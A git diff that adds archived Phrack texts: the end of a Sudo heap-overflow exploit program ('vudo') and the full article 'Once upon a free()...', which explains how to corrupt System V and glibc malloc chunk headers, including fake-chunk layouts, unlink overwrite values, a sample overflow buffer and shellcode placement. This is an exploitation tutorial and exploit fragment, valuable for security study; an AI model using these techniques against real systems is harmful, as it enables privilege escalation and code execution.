+    printf( "  - first: %u\n", ENVP_FIRST );
+    printf( "  - step: %u\n", ENVP_STEP );
+}
+
+/* main() */
+int
+main( int argc, char * argv[] )
+{
+    vudo_t vudo;
+
+    /* argc */
+    if ( argc != 4 ) {
+        usage( argv[0] );
+        return( -1 );
+    }
+
+    /* vudo.__malloc_hook */
+    vudo.__malloc_hook = strtoul( argv[1], NULL, 0 );
+    if ( vudo.__malloc_hook == ULONG_MAX ) {
+        return( -1 );
+    }
+
+    /* vudo.tz */
+    vudo.tz = strtoul( argv[2], NULL, 0 );
+    if ( vudo.tz == ULONG_MAX ) {
+        return( -1 );
+    }
+
+    /* vudo.envp */
+    vudo.envp = strtoul( argv[3], NULL, 0 );
+    if ( vudo.envp == ULONG_MAX ) {
+        return( -1 );
+    }
+
+    /* vudo.setenv */
+    vudo.setenv = vudo_setenv( getuid() );
+    if ( vudo.setenv == 0 ) {
+        return( -1 );
+    }
+
+    /* vudo.msg */
+    vudo.msg = vudo_msg( &vudo );
+
+    /* vudo.buf */
+    vudo.buf = vudo_buf( &vudo );
+
+    /* vudo.NewArgv */
+    vudo.NewArgv = vudo_NewArgv( &vudo );
+
+    /* vudo.execve_argv */
+    vudo.execve_argv = vudo_execve_argv( &vudo );
+    if ( vudo.execve_argv == NULL ) {
+        return( -1 );
+    }
+
+    /* vudo.execve_envp */
+    vudo.execve_envp = vudo_execve_envp( &vudo );
+    if ( vudo.execve_envp == NULL ) {
+        return( -1 );
+    }
+
+    /* execve */
+    execve( (vudo.execve_argv)[0], vudo.execve_argv, vudo.execve_envp );
+    return( -1 );
+}
+<-->
+
+--[ 5 - Acknowledgements ]----------------------------------------------
+
+Thanks to Todd Miller for the fascinating vulnerability, thanks to
+Chris Wilson for the vulnerability discovery, thanks to Doug Lea for
+the excellent allocator, and thanks to Solar Designer for the unlink()
+technique.
+
+Thanks to Synnergy for the invaluable support, the various operating
+systems, and the great patience... thanks for everything. Thanks to VIA
+(and especially to BBP and Kaliban) and thanks to the eXperts group (and
+particularly to Fred and Nico) for the careful (painful? :) rereading.
+
+Thanks to the antiSecurity movement (and peculiarly to JimJones and
+Portal) for the interesting discussions of disclosure issues. Thanks
+to MasterSecuritY since my brain worked unconsciously on the Sudo
+vulnerability during work time :)
+
+Thanks to Phrack for the professional work, and greets to superluck ;)
+
+
+--[ 6 - Outroduction ]--------------------------------------------------
+
+I stand up next to a mountain and chop it down with the edge of my hand.
+-- Jimi Hendrix (Voodoo Chile (slight return))
+
+The voodoo, who do, what you don't dare do people.
+-- The Prodigy (Voodoo People)
+
+I do Voodoo, but not on You
+-- efnet.vuurwerk.nl
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/9.txt b/phrack57/9.txt
new file mode 100644
index 0000000..b296487
--- /dev/null
+++ b/phrack57/9.txt
@@ -0,0 +1,857 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x09 of 0x12
+
+|=---------------------=[ Once upon a free()... ]=-----------------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------=[ anonymous <d45a312a@author.phrack.org> ]=-------------=|
+
+
+On the Unix system, and later in the C standard library there are functions
+to handle variable amounts of memory in a dynamic way. This allows programs
+to dynamically request memory blocks from the system. The operating system
+only provides a very rough system call 'brk' to change the size of a big
+memory chunk, which is known as the heap.
+
+On top of this system call the malloc interface is located, which provides
+a layer between the application and the system call. It can dynamically
+split the large single block into smaller chunks, free those chunks on
+request of the application and avoid fragmentation while doing so. You can
+compare the malloc interface to a linear file system on a large, but
+dynamically sized raw device.
+
+There are a few design goals which have to be met by the malloc interface:
+
+	- stability
+	- performance
+	- avoidance of fragmentation
+	- low space overhead
+
+There are only a few common malloc implementations. The most common ones
+are the System V one, implemented by AT&T, the GNU C Library implementation
+and the malloc-similar interface of the Microsoft operating systems
+(RtlHeap*).
+
+Here is a table of algorithms and which operating systems use them:
+
+Algorithm               | Operating System
+------------------------+--------------------------------------------------
+BSD kingsley            | 4.4BSD, AIX (compatibility), Ultrix
+BSD phk                 | BSDI, FreeBSD, OpenBSD
+GNU Lib C (Doug Lea)    | Hurd, Linux
+System V AT&T           | Solaris, IRIX
+Yorktown                | AIX (default)
+RtlHeap*                | Microsoft Windows *
+------------------------+--------------------------------------------------
+
+
+It is interesting to see that most of the malloc implementations are very
+easy to port and that they are architecture independent. Most of those
+implementations just build an interface with the 'brk' system call. You can
+change this behaviour with a #define. All of the implementations I have
+come across are written in ANSI C and just do very minimal or even no
+sanity checking. Most of them have a special compilation define that
+includes asserts and extra checks. Those are turned off by default in the
+final build for performance reasons. Some of the implementations also
+offer extra reliability checks that will detect buffer overflows. Those
+are made to detect overflows while development, not to stop exploitation
+in the final release.
+
+
+Storing management info in-band
+
+Most malloc implementations share the behaviour of storing their own
+management information, such as lists of used or free blocks, sizes of
+memory blocks and other useful data within the heap space itself. Since the
+whole idea of malloc/free is based on the dynamic requirements the
+application has, the management info itself occupies a variable amount of
+data too. Because of this, the implementation can seldomly just reserve a
+certain amount of memory for its own purposes, but stores the management
+information "in-band", right after and before the blocks of memory that are
+used by the application.
+
+Some applications do request a block of memory using the malloc interface,
+which later happens to be vulnerable to a buffer overflow. This way, the
+data behind the chunk can be changed. Possibly the malloc management
+structures can be compromised. This has been demonstrated first by Solar
+Designer's wizard-like exploit [1].
+
+The central attack of exploiting malloc allocated buffer overflows is to
+modify this management information in a way that will allow arbitrary
+memory overwrites afterwards. This way pointers can be overwritten within
+the writeable process memory, hence allowing modification of return
+addresses, linkage tables or application level data.
+
+To mount such an attack, we have to take a deep look within the internal
+workings of the implementation we want to exploit. This article discusses
+the commonly used GNU C Library and the System V implementation and how to
+gain control over a process using buffer overflows which occur in malloced
+buffers under Linux, Solaris and IRIX systems.
+
+
+System V malloc implementation
+==============================
+
+IRIX and Solaris use an implementation which is based on self-adjusting
+binary trees. The theoretical background of this implementation has been
+described in [2].
+
+The basic idea of this implementation is to keep lists of equally sized
+malloc chunks within a binary tree. If you allocate two chunks of the
+same size, they will be within the same node and within the same list of this
+node. The tree is ordered by the size of its elements.
+
+
+The TREE structure
+
+The definition of the TREE structure can be found in the mallint.h, along
+with some easy-to-use macros to access its elements. The mallint.h file
+can be found in the source distribution of the Solaris operating system
+[4]. Although I cannot verify that IRIX is based on the same source, there
+are several similarities which indicated this. The malloc interface
+internally creates the same memory layout and functions, besides some 64
+bit alignments. You can utilize the Solaris source for your IRIX exploits,
+too.
+
+To allow each tree element to be used for a different purpose to avoid
+overhead and force an alignment, each TREE structure element is defined
+as a union:
+
+
+/* the proto-word; size must be ALIGN bytes */
+typedef union _w_ {
+	size_t		w_i;		/* an unsigned int */
+	struct _t_	*w_p;		/* a pointer */
+	char		w_a[ALIGN];	/* to force size */
+} WORD;
+
+
+Central TREE structure definition:
+
+/* structure of a node in the free tree */
+typedef struct _t_ {
+	WORD	t_s;	/* size of this element */
+	WORD	t_p;	/* parent node */
+	WORD	t_l;	/* left child */
+	WORD	t_r;	/* right child */
+	WORD	t_n;	/* next in link list */
+	WORD	t_d;	/* dummy to reserve space for self-pointer */
+} TREE;
+
+
+The 't_s' element of the chunk header contains the rounded up value of the
+size the user requested when he called malloc. Since this size is always
+rounded up to a word boundary, at least the lower two bits of the 't_s'
+elements are unused - they normally would have the value of zero all the
+time. Instead of being zero, they are ignored for all size-related
+operations. They are used as flag elements. 
+
+From the malloc.c source it reads:
+
+   BIT0: 1 for busy (block is in use), 0 for free.
+
+   BIT1: if the block is busy, this bit is 1 if the preceding block in
+         contiguous memory is free. Otherwise, it is always 0.
+
+
+TREE Access macros:
+
+/* usable # of bytes in the block */
+#define	SIZE(b)		(((b)->t_s).w_i)
+
+/* free tree pointers */
+#define	PARENT(b)	(((b)->t_p).w_p)
+#define	LEFT(b)		(((b)->t_l).w_p)
+#define	RIGHT(b)	(((b)->t_r).w_p)
+
+/* forward link in lists of small blocks */
+#define	AFTER(b)	(((b)->t_p).w_p)
+
+/* forward and backward links for lists in the tree */
+#define	LINKFOR(b)	(((b)->t_n).w_p)
+#define	LINKBAK(b)	(((b)->t_p).w_p)
+
+
+For all allocation operations a certain alignment and minimum size is
+enforced, which is defined here:
+
+#define	WORDSIZE	(sizeof (WORD))
+#define	MINSIZE		(sizeof (TREE) - sizeof (WORD))
+#define	ROUND(s)	if (s % WORDSIZE) s += (WORDSIZE - (s % WORDSIZE))
+
+
+The tree structure is the central element of each allocated chunk. Normally
+only the 't_s' and 't_p' elements are used, and user data is stored from
+'t_l' on. Once the node is freed, this changes and the data is reused to
+manage the free elements more efficiently. The chunk represents an element
+within the splay tree. As more chunks get freed, the malloc implementation
+tries to merge the free chunks right next to it. At most FREESIZE (32 by
+default) chunks can be in this dangling free state at the same time. They
+are all stored within the 'flist' array. If a call to free is made while
+the list is already full, the old element at this place falls out and is
+forwarded to realfree. The place is then occupied by the newly freed
+element.
+
+This is done to speed up and avoid defragmentation in cases where a lot of
+calls to free are made in a row. The real merging process is done by
+realfree.  It inserts the chunk into the central tree, which starts at the
+'Root' pointer. The tree is ordered by the size of its elements and
+is self-balancing. It is a so called "splay tree", in which the elements
+cycle in a special way to speed up searches (see google.com "splay tree"
+for further information). This is not much of importance here, but keep in
+mind that there are two stages of free chunks: one being within the flist
+array, and one within the free-elements tree starting at 'Root'.
+
+There are some special management routines for allocating small chunks of
+memory, which happen to have a size below 40 bytes. Those are not
+considered here, but the basic idea is to have extra lists of them, not
+keeping them within a tree but in lists, one for each WORD matching size
+below 40.
+
+There is more than one way to exploit a malloc based buffer overflow,
+however here is one method which works against both, IRIX and Solaris.
+
+As a chunk is realfree'd, it is checked whether the neighbor-chunks are
+already within the realfree'd tree. If it is the case, the only thing
+that has to be done is to logically merge the two chunks and reorder its
+position within the tree, as the size has changed.
+
+This merging process involves pointer modification within the tree, which
+consists of nodes. These nodes are represented by the chunk header
+itself. Pointers to other tree elements are stored there. If we can
+overwrite them, we can possibly modify the operation when merging the
+chunks.
+
+Here is, how it is done in malloc.c:
+(modified to show the interesting part of it)
+
+static void
+realfree(void *old)
+{
+	TREE	*tp, *sp, *np;
+	size_t	ts, size;
+
+	/* pointer to the block */
+	tp = BLOCK(old);
+	ts = SIZE(tp);
+	if (!ISBIT0(ts))
+		return;
+	CLRBITS01(SIZE(tp));
+
+	/* see if coalescing with next block is warranted */
+	np = NEXT(tp);
+	if (!ISBIT0(SIZE(np))) {
+		if (np != Bottom)
+			t_delete(np);
+		SIZE(tp) += SIZE(np) + WORDSIZE;
+	}
+
+We remember NEXT points to the chunk directly following the current one. So
+we have this memory layout:
+
+          tp               old              np
+          |                |                |
+          [chunk A header] [chunk A data] | [chunk B or free ....]
+                                          |
+                                          chunk boundary
+
+In the usual situation the application has allocated some space and got a
+pointer (old) from malloc. It then messes up and allows a buffer overflow
+of the chunk data. We cross the chunk boundary by overflowing and hit the
+data behind, which is either free space or another used chunk.
+
+	np = NEXT(tp);
+
+Since we can only overflow data behind 'old', we cannot modify the header
+of our own chunk. Therefore we cannot influence the 'np' pointer in any
+way. It always points to the chunk boundary.
+
+Now a check is made to test if it is possible to merge forward, that is our
+chunk and the chunk behind it. Remember that we can control the chunk
+to the right of us.
+
+	if (!ISBIT0(SIZE(np))) {
+		if (np != Bottom)
+			t_delete(np);
+		SIZE(tp) += SIZE(np) + WORDSIZE;
+	}
+ 
+BIT0 is zero if the chunk is free and within the free elements tree. So if
+it is free and not the last chunk, the special 'Bottom' chunk, it is
+deleted from the tree. Then the sizes of both chunks are added and later in
+the code of the realfree function the whole resized chunk is reinserted
+into the tree.
+
+One important part is that the overflowed chunk must not be the last chunk
+within the malloc space, condition:
+
+        1. Overflowed chunk must not be the last chunk
+
+Here is how the 't_delete' function works:
+
+static void
+t_delete(TREE *op)
+{
+	TREE	*tp, *sp, *gp;
+
+	/* if this is a non-tree node */
+	if (ISNOTREE(op)) {
+		tp = LINKBAK(op);
+		if ((sp = LINKFOR(op)) != NULL)
+			LINKBAK(sp) = tp;
+		LINKFOR(tp) = sp;
+		return;
+	}
+
+There are other cases, but this is the one easiest to exploit. As I am
+already tired of this, I will just explain this one here. The others are
+very similar (look at malloc.c).
+
+ISNOTREE compares the 't_l' element of the TREE structure with -1. -1 is
+the special marker for non-tree nodes, which are used as doubly linked list,
+but that does not matter.
+
+Anyway, this is the first condition we have to obey:
+
+        2. fake->t_l = -1;
+
+Now the unlinking between FOR (t_n) and BAK (t_p) is done, which can be
+rewritten as:
+
+	t1 = fake->t_p
+	t2 = fake->t_n
+	t2->t_p = t1
+	t1->t_n = t2
+
+Which is (written in pseudo-raw-assignments which happen at the same time):
+
+	[t_n + (1 * sizeof (WORD))] = t_p
+	[t_p + (4 * sizeof (WORD))] = t_n
+
+This way we can write to arbitrary addresses together with valid
+addresses at the same time. We choose to use this:
+
+	t_p = retloc - 4 * sizeof (WORD)
+	t_n = retaddr
+
+This way retloc will be overwritten with retaddr and *(retaddr + 8) will be
+overwritten with retloc. If there is code at retaddr, there should be a
+small jump over the bytes 8-11 to not execute this address as code. Also,
+the addresses can be swapped if that fits the situation better.
+
+Finally our overwrite buffer looks like this:
+
+  | <t_s> <t_p> <t_l> <j: t_r> <t_n> <j: t_d>
+  |
+  chunk boundary
+
+Where: t_s = some small size with lower two bits zeroed out
+       t_p = retloc - 4 * sizeof (WORD)
+       t_l = -1
+       t_r = junk
+       t_n = retaddr
+       t_d = junk
+
+Note that although all of the data is stored as 32 bit pointers, each
+structure element occupies eight bytes. This is  because of the WORD
+union, which forces at least ALIGN bytes to be used for each element.
+ALIGN is defined to eight by default.
+
+So a real overflow buffer behind the chunk boundary might look like:
+
+ff ff ff f0 41 41 41 41  ef ff fc e0 41 41 41 41  | ....AAAA....AAAA
+ff ff ff ff 41 41 41 41  41 41 41 41 41 41 41 41  | ....AAAAAAAAAAAA
+ef ff fc a8 41 41 41 41  41 41 41 41 41 41 41 41  | ....AAAAAAAAAAAA
+
+All 'A' characters can be set arbitrarily. The 't_s' element has been
+replaced with a small negative number to avoid NUL bytes. If you want to use
+NUL bytes, use very few. Otherwise the realfree function will crash later.
+
+The buffer above will overwrite:
+
+	[0xeffffce0 + 32] = 0xeffffca8
+	[0xeffffca8 +  8] = 0xeffffce0
+
+See the example code (mxp.c) for a more in-depth explanation.
+
+To summarize down the guts if you happen to exploit a malloc based buffer
+overflow on IRIX or Solaris:
+
+       1. Create a fake chunk behind the one you overflow
+       2. The fake chunk is merged with the one you overflow as it is
+          passed to realfree
+       3. To make it pass to realfree it has to call malloc() again or
+          there have to be a lot of successive free() calls
+       4. The overflowed chunk must not be the last chunk (the one before
+          Bottom)
+       5. Prepend the shellcode/nop-space with jump-aheads to not execute
+          the unavoidable unlink-overwrite address as code
+       6. Using the t_splay routines attacks like this are possible too, so
+          if you cannot use the attack described here (say you cannot
+          write 0xff bytes), use the source luke.
+
+
+There are a lot of other ways to exploit System V malloc management, way
+more than there are available in the GNU implementation. This is a result
+of the dynamic tree structure, which also makes it difficult to understand
+sometimes. If you have read until here, I am sure you can find your own
+ways to exploit malloc based buffer overflows.
+
+
+GNU C Library implementation
+============================
+
+The GNU C library keeps the information about the memory slices the
+application requests in so called 'chunks'. They look like this (adapted
+from malloc.c):
+
+             +----------------------------------+
+    chunk -> | prev_size                        |
+             +----------------------------------+
+             | size                             |
+             +----------------------------------+
+      mem -> | data                             |
+             : ...                              :
+             +----------------------------------+
+nextchunk -> | prev_size ...                    |
+             :                                  :
+
+Where mem is the pointer you get as return value from malloc(). So if you
+do a:
+
+        unsigned char *	mem = malloc (16);
+
+Then 'mem' is equal to the pointer in the figure, and (mem - 8) would be
+equal to the 'chunk' pointer.
+
+The 'prev_size' element has a special function: If the chunk before the
+current one is unused (it was free'd), it contains the length of the chunk
+before. In the other case - the chunk before the current one is used -
+'prev_size' is part of the 'data' of it, saving four bytes.
+
+The 'size' field has a special meaning. As you would expect, it contains
+the length of the current block of memory, the data section. As you call
+malloc(), four is added to the size you pass to it and afterwards the size
+is padded up to the next double-word boundary. So a malloc(7) will become a
+malloc(16), and a malloc(20) will become malloc(32). For malloc(0) it will
+be padded to malloc(8). The reason for this behaviour will be explained in
+the latter.
+
+Since this padding implies that the lower three bits are always zero and
+are not used for real length, they are used another way. They are used to
+indicate special attributes of the chunk. The lowest bit, called
+PREV_INUSE, indicates whether the previous chunk is used or not. It is set
+if the next chunk is in use. The second least significant bit is set if the
+memory area is mmap'ed -- a special case which we will not consider.  The
+third least significant bit is unused.
+
+To test whether the current chunk is in use or not, we have to check the
+next chunk's PREV_INUSE bit within its size value.
+
+Once we free() the chunk, using free(mem), some checks take place and the
+memory is released. If its neighbour blocks are free, too (checked using
+the PREV_INUSE flag), they will be merged to keep the number of reuseable
+blocks low, but their sizes as large as possible. If a merge is not
+possible, the next chunk is tagged with a cleared PREV_INUSE bit, and the
+chunk changes a bit:
+
+             +----------------------------------+
+    chunk -> | prev_size                        |
+             +----------------------------------+
+             | size                             |
+             +----------------------------------+
+      mem -> | fd                               |
+             +----------------------------------+
+             | bk                               |
+             +----------------------------------+
+             | (old memory, can be zero bytes)  |
+             :                                  :
+
+nextchunk -> | prev_size ...                    |
+             :                                  :
+
+You can see that there are two new values, where our data was previously
+stored (at the 'mem' pointer). Those two values, called 'fd' and 'bk' -
+forward and backward, that is, are pointers. They point into a double
+linked list of unconsolidated blocks of free memory. Every time a new free
+is issued, the list will be checked, and possibly unconsolidated blocks
+are merged. The whole memory gets defragmented from time to time to release
+some memory.
+
+Since the malloc size is always at least 8 bytes, there is enough space for
+both pointers. If there is old data remaining behind the 'bk' pointer, it
+remains unused until it gets malloc'd again.
+
+The interesting thing regarding this management, is that the whole internal
+information is held in-band -- a clear channeling problem.
+(just as with format string commands within the string itself, as control
+channels in breakable phonelines, as return addresses within stack memory,
+etc).
+
+Since we can overwrite this internal management information if we can
+overwrite a malloced area, we should take a look at how it is processed
+later on. As every malloc'ed area is free()'d again in any sane program,
+we take a look at free, which is a wrapper to chunk_free() within malloc.c
+(simplified a bit, took out #ifdef's):
+
+static void
+chunk_free(arena *ar_ptr, mchunkptr p)
+{
+  size_t     hd = p->size; /* its head field */
+  size_t     sz;           /* its size */
+  int        idx;          /* its bin index */
+  mchunkptr  next;         /* next contiguous chunk */
+  size_t     nextsz;       /* its size */
+  size_t     prevsz;       /* size of previous contiguous chunk */
+  mchunkptr  bck;          /* misc temp for linking */
+  mchunkptr  fwd;          /* misc temp for linking */
+  int        islr;         /* track whether merging with last_remainder */
+
+  check_inuse_chunk(ar_ptr, p);
+
+  sz = hd & ~PREV_INUSE;
+  next = chunk_at_offset(p, sz);
+  nextsz = chunksize(next);
+
+Since the malloc management keeps chunks within special structures called
+'arenas', it is now tested whether the current chunk that should be free
+directly borders to the 'top' chunk -- a special chunk. The 'top' chunk is
+always the top-most available memory chunk within an arena, it is the border
+of the available memory. The whole if-block is not interesting for typical
+buffer overflows within the malloc space.
+
+  if (next == top(ar_ptr))                         /* merge with top */
+  {
+    sz += nextsz;
+
+    if (!(hd & PREV_INUSE))                    /* consolidate backward */
+    {
+      prevsz = p->prev_size;
+      p = chunk_at_offset(p, -(long)prevsz);
+      sz += prevsz;
+      unlink(p, bck, fwd);
+    }
+
+    set_head(p, sz | PREV_INUSE);
+    top(ar_ptr) = p;
+
+      if ((unsigned long)(sz) >= (unsigned long)trim_threshold)
+        main_trim(top_pad);
+    return;
+  }
+
+Now the 'size' of the current chunk is tested whether the previous chunk is
+unused (testing for the PREV_INUSE flag). If this is the case, both chunks
+are merged.
+
+  islr = 0;
+
+  if (!(hd & PREV_INUSE))                    /* consolidate backward */
+  {
+    prevsz = p->prev_size;
+    p = chunk_at_offset(p, -(long)prevsz);
+    sz += prevsz;
+
+    if (p->fd == last_remainder(ar_ptr))     /* keep as last_remainder */
+      islr = 1;
+    else
+      unlink(p, bck, fwd);
+  }
+
+Now the same is done vice versa. It is checked whether the chunk in front
+of the current chunk is free (testing for the PREV_INUSE flag of the size
+two chunks ahead). If this is the case the chunk is also  merged into the
+current one.
+
+  if (!(inuse_bit_at_offset(next, nextsz)))   /* consolidate forward */
+  {
+    sz += nextsz;
+
+    if (!islr && next->fd == last_remainder(ar_ptr))
+                                              /* re-insert last_remainder */
+    {
+      islr = 1;
+      link_last_remainder(ar_ptr, p);
+    }
+    else
+      unlink(next, bck, fwd);
+
+    next = chunk_at_offset(p, sz);
+  }
+  else
+    set_head(next, nextsz);                  /* clear inuse bit */
+
+  set_head(p, sz | PREV_INUSE);
+  next->prev_size = sz;
+  if (!islr)
+    frontlink(ar_ptr, p, sz, idx, bck, fwd);
+}
+
+As Solar Designer showed us, it is possible to use the 'unlink' macro to
+overwrite arbitrary memory locations. Here is how to do:
+
+A usual buffer overflow situation might look like:
+
+        mem = malloc (24);
+        gets (mem);
+        ...
+        free (mem);
+
+This way the malloc'ed chunk looks like this:
+
+[ prev_size ] [ size P] [ 24 bytes ... ] (next chunk from now)
+       [ prev_size ] [ size P] [ fd ] [ bk ] or [ data ... ]
+
+As you can see, the next chunk directly borders to our chunk we overflow.
+We can overwrite anything behind the data region of our chunk, including
+the header of the following chunk.
+
+If we take a closer look at the end of the chunk_free function, we see this
+code:
+
+  if (!(inuse_bit_at_offset(next, nextsz)))   /* consolidate forward */
+  {
+    sz += nextsz;
+
+    if (!islr && next->fd == last_remainder(ar_ptr))
+                                              /* re-insert last_remainder */
+    {
+      islr = 1;
+      link_last_remainder(ar_ptr, p);
+    }
+    else
+      unlink(next, bck, fwd);
+
+    next = chunk_at_offset(p, sz);
+  }
+
+The inuse_bit_at_offset, is defined as macro in the beginning of malloc.c:
+
+#define inuse_bit_at_offset(p, s)\
+ (((mchunkptr)(((char*)(p)) + (s)))->size & PREV_INUSE)
+
+Since we control the header of the 'next' chunk we can trigger the whole if
+block at will. The inner if statement is uninteresting, except our chunk is
+bordering to the top-most chunk. So if we choose to trigger the outer if
+statement, we will call unlink, which is defined as macro, too:
+
+#define unlink(P, BK, FD)                                                \
+{                                                                        \
+  BK = P->bk;                                                            \
+  FD = P->fd;                                                            \
+  FD->bk = BK;                                                           \
+  BK->fd = FD;                                                           \
+}
+
+The unlink is called with a pointer to a free chunk and two temporary
+pointer variables, called bck and fwd. It does this to the 'next' chunk
+header:
+
+  *(next->fd + 12) = next->bk
+  *(next->bk + 8) = next->fd
+
+They are not swapped, but the 'fd' and 'bk' pointers point to other chunks.
+This two chunks being pointed to are linked, zapping the current chunk from
+the table.
+
+So to exploit a malloc based buffer overflow, we have to write a bogus
+header in the following chunk and then wait for our chunk getting free'd.
+
+        [buffer .... ] | [ prev_size ] [ size ] [ fd ] [ bk ]
+
+'|' is the chunk boundary.
+
+The values we set for 'prev_size' and 'size' do not matter, but two
+conditions have to be met, in case it should work:
+
+  a) the least significant bit of 'size' has to be zero
+  b) both, 'prev_size' and 'size' should be add-safe to a pointer that is
+     read from. So either use very small values up to a few thousand, or -
+     to avoid NUL bytes - use big values such as 0xfffffffc.
+  c) you have to ensure that at (chunk_boundary + size + 4) the lowest bit
+     is zeroed out (0xfffffffc will work just fine)
+
+'fd' and 'bk' can be set this way (as used in Solar Designers Netscape
+Exploit):
+
+  fd = retloc - 12
+  bk = retaddr
+
+But beware, that (retaddr + 8) is being written to and the content there
+will be destroyed. You can circumvent this by a simple '\xeb\x0c' at
+retaddr, which will jump twelve bytes ahead, over the destroyed content.
+
+Well, however, exploitation is pretty straight forward now:
+
+<jmp-ahead, 2> <6> <4 bogus> <nop> <shellcode> |
+        \xff\xff\xff\xfc \xff\xff\xff\xfc <retloc - 12> <retaddr>
+
+Where '|' is the chunk boundary (from that point we overflow). Now, the
+next two negative numbers are just to survive a few checks in free() and to
+avoid NUL bytes. Then we store (retloc - 12) properly encoded and then the
+return address, which will return to the 'jmp-ahead'. The buffer before the
+'|' is the same as with any x86 exploit, except for the first 12 bytes,
+because we have to take care of the extra write operation by the unlink
+macro.
+
+
+Off-by-one / Off-by-five
+------------------------
+
+It is possible to overwrite arbitrary pointers, even in cases where you can
+overwrite only five bytes, or - in special cases - only one byte. When
+overwriting five bytes the memory layout has to look like:
+
+        [chunk a] [chunk b]
+
+Where chunk a is under your control and overflowable. Chunk b is already
+allocated as the overflow happens. By overwriting the first five bytes of
+chunk b, we trash the 'prev_size' element of the chunks header and the
+least significant byte of the 'size' element. Now, as chunk b is free()'d,
+backward consolidation pops in, since 'size' has the PREV_INUSE flag
+cleared (see below). If we supply a small value for 'prev_size', which is
+smaller than the size of chunk a, we create a fake chunk structure:
+
+        [chunk a ... fakechunk ...] [chunk b]
+                     |
+                     p 
+
+Where prev_size of chunk b points relativly negative to the fake chunk.
+The code which is exploitable through this setting was already discussed:
+
+  if (!(hd & PREV_INUSE))                    /* consolidate backward */
+  {
+    prevsz = p->prev_size;
+    p = chunk_at_offset(p, -(long)prevsz);
+    sz += prevsz;
+
+    if (p->fd == last_remainder(ar_ptr))     /* keep as last_remainder */
+      islr = 1;
+    else
+      unlink(p, bck, fwd);
+  }
+
+'hd' is the size element of chunk b. When we overwrite it, we clear out the
+lower two bits, so PREV_INUSE is cleared and the if condition is matched
+(NUL will do it in fact). In the next few instructions 'p', which was a
+pointer to chunk b originally, is relocated to our fakechunk. Then the
+unlink macro is called and we can overwrite the pointers as usual. We use
+backward consolidation now, while in the previous description we have used
+forward consolidation. Is this all confusing? Well, when exploiting malloc
+overflows, do not worry about the details, they will become clearer as you
+understand the malloc functions from a broader scope.
+
+  For a really well done overview and description of the malloc
+implementation in the GNU C Library, take a look at the GNU C Library
+reference manual [3]. It makes a good read for non-malloc related things,
+too.
+
+
+Possible obstacles and how to get over with them
+================================================
+
+As with any new exploitation technique people will show up which have the
+'perfect' solution to the problem in their head or in form of a patch to
+the malloc functions. Those people - often ones who have never written
+an exploit themselves - are misleading into a wrong sense of security and I
+want to leave a few words about those approaches and why they seldomly work.
+
+There are three host based stages where you can stop a buffer overflow
+resulting in a compromise:
+
+ 1. The bug/overflow stage
+
+    This is the place where the real overflow happens, where data is
+overwritten. If this place is known, the origin of the problem can be fixed
+(at source level). However, most approaches argue that this place is not
+known and therefore the problem cannot be fixed yet.
+
+ 2. The activation stage
+
+    After the overflow happened parts of the data of the application are
+corrupted. It does not matter what kind of data, whether it is a stack
+frame, a malloc management record or static data behind a buffer. The
+process is still running its own path of code, the overwritten data is
+still passive. This stage is everything after the overflow itself and
+before the seize of execution control. This is where the natural,
+non-artificially introduced hurdles for the attacker lies, code which must
+be passed in a certain way.
+
+ 3. The seized stage
+
+    This is everything after control has been redirected from its original
+path of execution. This is the stage where nopspace and shellcode is
+executed, where no real exploitation hurdles are left.
+
+
+Now for the protection systems. Most of the "non-exec stack" and "non-exec
+heap" patches try to catch the switch from stage two to three, where
+execution is seized, while some proprietary systems check for the origin of
+a system call from within kernel space. They do not forbid you to run code
+this way, they try to limit what code can be run.
+
+Those systems which allow you to redirect execution in the first place are
+fundamentally flawed. They try to limit the exploitation in a black-listing
+way, by trying to plug the places you may want to go to. But if you can
+execute legal code within the process space its almost everytime enough to
+compromise the process as a whole.
+
+Now for the more challenging protections, which try to gripe you in stage
+two. Those include - among others - libsafe, StackGuard, FormatGuard, and
+any compiler or library based patches. They usually require a recompilation
+or relinking of your existing code, to insert their security 'measures'
+into your code. This includes canary values, barriers of check bytes or
+reordering and extensive checking of sanity before doing things which might
+be bad. While sanity checking in general is a good policy for security, it
+cannot fix stuff that was broken before. Every of those protections is
+assuming a certain situation of a bug which might appear in your program
+and try to predict the results of an attacker abusing the bug. They setup
+traps which they assume you will or have to trigger to exploit the bug.
+This is done before your control is active, so you cannot influence it
+much except by choosing the input data. Those are, of course much more
+tight than protection systems which only monitor stage three, but still
+there are ways around them. A couple of ways have been discussed in the
+past, so I will not go into depth here. Rather, I will briefly address on a
+protection which I already see on the horizon under a name like
+'MallocGuard'.
+
+Such a protection would not change the mechanism of malloc management
+chunks much, since the current code has proved to be effective. The malloc
+function plays a key role in overall system performance, so you cannot
+tweak freely here. Such a protection can only introduce a few extra checks,
+it cannot verify the entire consistency everytime malloc() is called. And
+this is where it is flawed: Once you seize control over one malloc chunk
+information, you can seize control over other chunks too. Because chunks
+are 'walked' by using either stored pointers (SysV) or stored lengths
+(GlibC), it is possible to 'create' new chunks. Since a sanity check would
+have to assume inconsistency of all chunks in the worst case, it would have
+to check all chunks by walking them. But this would eat up too much
+performance, so its impossible to check for malloc overflows easily while
+still keep a good performance. So, there will be no 'MallocGuard', or it
+will be a useless guard, in the tradition of useless pseudo protections. As
+a friend puts it - 'for every protection there is an anti-protection'.
+
+
+Thanks
+======
+
+I would like to thank all proofreaders and correctors. For some really
+needed corrections I thank MaXX, who wrote the more detailed article about
+GNU C Library malloc in this issue of Phrack, kudos to him ! :)
+
+
+References
+==========
+
+[1] Solar Designer,
+    http://www.openwall.com/advisories/OW-002-netscape-jpeg.txt
+[2] DD Sleator, RE Tarjan, "Self-Adjusting Binary Trees", 1985,
+    http://www.acm.org/pubs/citations/journals/jacm/1985-32-3/p652-sleator/
+    http://www.math.tau.ac.il/~haimk/adv-ds-2000/sleator-tarjan-splay.pdf
+[3] The GNU C Library
+    http://www.gnu.org/manual/glibc-2.2.3/html_node/libc_toc.html
+[4] Solaris 8 Foundation Source Program
+    http://www.sun.com/software/solaris/source/
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack58/1.txt b/phrack58/1.txt
new file mode 100644
index 0000000..e15a5fc
--- /dev/null
+++ b/phrack58/1.txt
@@ -0,0 +1,169 @@
+                                ==Phrack Inc.==
+
+                   Volume 0x0b, Issue 0x3a, Phile #0x01 of 0x0e
+
+        ,                                                            ,
+    ,   |\ ,__                                                  __, /|   ,
+    |\   \/   `.                                              .'   \/   /|
